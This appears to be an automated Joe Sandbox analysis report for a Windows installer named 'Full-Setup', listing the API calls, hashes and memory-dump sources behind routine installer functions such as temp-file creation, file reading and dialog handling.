                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                                                                                          • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                          • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                          • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                          • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                          • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                          • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                          • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                          • String ID: HideWindow
                                                                                                                                                                          • API String ID: 1249568736-780306582
                                                                                                                                                                          • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                          • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                          • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                          • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                          APIs
                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                          • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                          • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                          • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                          • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                          • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                          • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                          • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                          APIs
                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                          • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                          • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                          • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                          • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4115351271-0
                                                                                                                                                                          • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                          • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                          • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                          • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                          • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                          • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                          • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                          • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                          • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                          • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                          • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                          APIs
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                          • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                          • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                          • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
